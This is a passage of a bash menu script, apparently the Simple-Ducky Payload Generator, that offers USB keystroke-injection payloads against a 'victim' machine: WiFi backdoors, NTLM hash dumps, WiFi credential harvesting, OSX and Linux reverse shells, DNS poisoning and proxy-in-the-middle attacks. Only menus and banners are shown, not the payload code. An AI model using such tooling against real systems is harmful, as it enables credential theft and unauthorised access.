		if [ "$uacenabled" == "y" ]; then
			f_powershellWIN8admuac
		elif [ "$uacenabled" == "n" ]; then
			f_powershellWIN8admnouac
		fi
	elif [ "$option" == "12" ]; then
		f_mainmenu
	elif [ "$option" == "13" ]; then
		clear;exit
	elif [ "$option" == "*" ]; then
		clear;exit
	fi
}

#################################################################################
# Wifi Attacks - Banner
#################################################################################
f_wifibanner(){
	clear
	echo -e "\e[1;31mSimple-Ducky Payload Generator\e[0m "
	echo -e "Some of these payloads go great with the WiFi Pineapple"
	echo -e "If you would like to contribute your payload contact the author at skysploit@gmail.com"
	echo -e "\e[1;31mAuthor:\e[0m Travis Weathers (skysploit)"
	echo -e ""
}

#################################################################################
# Wifi Attacks - Options
################################################################################
f_wifimenu(){

f_wifibanner
	echo -e "\e[1;34mWhat payload would you like to use?\e[0m"
	echo ""
	echo "1. WiFi Backdoor (Win Vista/7)"
	echo "2. WiFi Backdoor (Win 8)"
	echo "3. WiFi Autoconnect (Designed for the WiFi Pineapple | Win Vista/7)"
	echo "4. WiFi Autoconnect (Designed for the WiFi Pineapple | Win 8)"
	echo "5. Return to Main Menu"
	echo "6. Quit"
	echo ""
	read -p "Option: " option


		if [ "$option" == "1" ]; then
		echo ""
		read -p "Is User Access Control (UAC) enabled on the victims machine [y|n]? " uacenabled
		if [ "$uacenabled" == "y" ]; then
			f_wifibackdoorVIS7uac
		elif [ "$uacenabled" == "n" ]; then
			f_wifibackdoorVIS7nouac
		fi
	elif [ "$option" == "2" ]; then
		echo ""
		read -p "Is User Access Control (UAC) enabled on the victims machine [y|n]? " uacenabled
		if [ "$uacenabled" == "y" ]; then
			f_wifibackdoorWIN8uac
		elif [ "$uacenabled" == "n" ]; then
			f_wifibackdoorWIN8nouac
		fi
	elif [ "$option" == "3" ]; then
		echo ""
		read -p "Is User Access Control (UAC) enabled on the victims machine [y|n]? " uacenabled
		if [ "$uacenabled" == "y" ]; then
			f_wifiautoconnectVIS7uac
		elif [ "$uacenabled" == "n" ]; then
			f_wifiautoconnectVIS7nouac
		fi
	elif [ "$option" == "4" ]; then
		echo ""
		read -p "Is User Access Control (UAC) enabled on the victims machine [y|n]? " uacenabled
		if [ "$uacenabled" == "y" ]; then
			f_wifiautoconnectWIN8uac
		elif [ "$uacenabled" == "n" ]; then
			f_wifiautoconnectWIN8nouac
		fi
	elif [ "$option" == "5" ]; then
		f_mainmenu
	elif [ "$option" == "6" ]; then
		clear;exit
	elif [ "$option" == "*" ]; then
		clear;exit
fi

}

#################################################################################
# Password Attacks - Banner
#################################################################################
f_passwordbanner(){
	clear
	echo -e "\e[1;31mSimple-Ducky Payload Generator\e[0m "
	echo -e "Awww... The power of credential harvesting."
	echo -e "If you would like to contribute your payload contact the author at skysploit@gmail.com"
	echo -e "\e[1;31mAuthor:\e[0m Travis Weathers (skysploit)"
	echo -e ""
}

#################################################################################
# Password Attacks - Options
################################################################################
f_passwordmenu(){

f_passwordbanner
	echo -e "\e[1;34mWhat payload would you like to use?\e[0m"
	echo ""
	echo "1. LM/NTLM Hash Dump From Live System (Win Vista/7)"
	echo "2. LM/NTLM Hash Dump From Live System (Win 8)"
	echo "3. WiFi Acess Point Crediential Harvester (Win Vista/7)"
	echo "4. WiFi Acess Point Crediential Harvester (Win 8)"
	echo "5. Return to Main Menu"
	echo "6. Quit"
	echo ""
	read -p "Option: " option

	if [ "$option" == "1" ]; then
		echo ""
		read -p "Is User Access Control (UAC) enabled on the victims machine [y|n]? " uacenabled
		if [ "$uacenabled" == "y" ]; then
			f_livehashVIS7uac
		elif [ "$uacenabled" == "n" ]; then
			f_livehashVIS7nouac
		fi
	elif [ "$option" == "2" ]; then
		echo ""
		read -p "Is User Access Control (UAC) enabled on the victims machine [y|n]? " uacenabled
		if [ "$uacenabled" == "y" ]; then
			f_livehashWIN8uac
		elif [ "$uacenabled" == "n" ]; then
			f_livehashWIN8nouac
		fi
	elif [ "$option" == "3" ]; then
		echo ""
		read -p "Is User Access Control (UAC) enabled on the victims machine [y|n]? " uacenabled
		if [ "$uacenabled" == "y" ]; then
			f_wifunVIS7uac
		elif [ "$uacenabled" == "n" ]; then
			f_wifunVIS7nouac
		fi
	elif [ "$option" == "4" ]; then
		echo ""
		read -p "Is User Access Control (UAC) enabled on the victims machine [y|n]? " uacenabled
		if [ "$uacenabled" == "y" ]; then
			f_wifunWIN8uac
		elif [ "$uacenabled" == "n" ]; then
			f_wifunWIN8nouac
		fi
	elif [ "$option" == "5" ]; then
		f_mainmenu
	elif [ "$option" == "6" ]; then
		clear;exit
	elif [ "$option" == "*" ]; then
		clear;exit
fi

}

#################################################################################
# Linux & OSX - Banner
#################################################################################
f_linuxosxbanner(){
	clear
	echo -e "\e[1;31mSimple-Ducky Payload Generator\e[0m "
	echo -e "Not much here but they work"
	echo -e "If you would like to contribute your payload contact the author at skysploit@gmail.com"
	echo -e "\e[1;31mAuthor:\e[0m Travis Weathers (skysploit) "
	echo -e ""
}

#################################################################################
# Linux & OSX - Options
#################################################################################
f_linuxosxmenu(){

f_linuxosxbanner
	echo -e "\e[1;34mWhat payload would you like to use?\e[0m"
	echo ""
	echo "1. OSX Reverse Shell"
	echo "2. OSX Single User Mode Reverse Shell"
	echo "3. Linux Reverse Shell"
	echo "4. Return to Main Menu"
	echo "5. Quit"
	echo ""
	read -p "Option: " option

	case $option in
	1) f_osxrev ;;
	2) f_osxsingleuserrev ;;
	3) f_linuxrev ;;
	4) f_mainmenu ;;
	5) clear;exit ;;
	*) clear;exit ;;
	esac

}

#################################################################################
# Forced Phishing / Web Attacks - Banner
#################################################################################
f_forcedphishbanner(){
	clear
	echo -e "\e[1;31mSimple-Ducky Payload Generator\e[0m "
	echo -e "Forced Phishing, because they don't have an option..."
	echo -e "If you would like to contribute your payload contact the author at skysploit@gmail.com"
	echo -e "\e[1;31mAuthor:\e[0m Travis Weathers (skysploit)"
	echo -e ""
}

#################################################################################
# Forced Phishing / Web Attacks - Options
################################################################################
f_forcedphishmenu(){

f_forcedphishbanner
	echo -e "\e[1;34mWhat payload would you like to use?\e[0m"
	echo ""
	echo "1. Local DNS Poisoning | SE-Toolkit w/UAC (Win Vista/7)"
	echo "2. Local DNS Poisoning | SE-Toolkit w/UAC (Win 8)"
	echo "3. Local DNS Poisoning | Browser_Autopwn w/UAC (Win Vista/7)"
	echo "4. Local DNS Poisoning | Browser_Autopwn w/UAC (Win 8)"
	echo "5. Proxy in the Middle (PiTM) | No Admin Needed (Win XP/Vista/7)"
	echo "6. Proxy in the Middle (PiTM) | No Admin Needed (Win 8)"
	echo "7. Return to Main Menu"
	echo "8. Quit"
	echo ""
	read -p "Option: " option


	if [ "$option" == "1" ]; then
		echo ""
		read -p "Is User Access Control (UAC) enabled on the victims machine [y|n]? " uacenabled
		if [ "$uacenabled" == "y" ]; then
			f_setlocaldnsVIS7uac
		elif [ "$uacenabled" == "n" ]; then
			f_setlocaldnsVIS7nouac
		fi
	elif [ "$option" == "2" ]; then
		echo ""
		read -p "Is User Access Control (UAC) enabled on the victims machine [y|n]? " uacenabled
		if [ "$uacenabled" == "y" ]; then
			f_setlocaldnsWIN8uac
		elif [ "$uacenabled" == "n" ]; then
			f_setlocaldnsWIN8nouac
		fi
	elif [ "$option" == "3" ]; then
		echo ""
		read -p "Is User Access Control (UAC) enabled on the victims machine [y|n]? " uacenabled
		if [ "$uacenabled" == "y" ]; then
			f_autopwnlocaldnsVIS7uac
		elif [ "$uacenabled" == "n" ]; then
			f_autopwnlocaldnsVIS7nouac
		fi
	elif [ "$option" == "4" ]; then
		echo ""
		read -p "Is User Access Control (UAC) enabled on the victims machine [y|n]? " uacenabled
		if [ "$uacenabled" == "y" ]; then
			f_autopwnlocaldnsWIN8uac
		elif [ "$uacenabled" == "n" ]; then
			f_autopwnlocaldnsWIN8nouac
		fi
	elif [ "$option" == "5" ]; then
		f_proxyinthemiddleXPVIS7
	elif [ "$option" == "6" ]; then
		f_proxyinthemiddleWIN8
	elif [ "$option" == "7" ]; then
		f_mainmenu
	elif [ "$option" == "8" ]; then
		clear;exit
	elif [ "$option" == "*" ]; then
		clear;exit
fi

}

#################################################################################
# Run as Root Query
#################################################################################
#!/bin/bash
#resize -s 35 115
cd /usr/share/simple-ducky
if [ "$(id -u)" != "0" ]; then
	echo -e "\e[1;31m[!] This script must be run as root\e[0m" 1>&2
	exit 1
else
	f_mainmenu
fi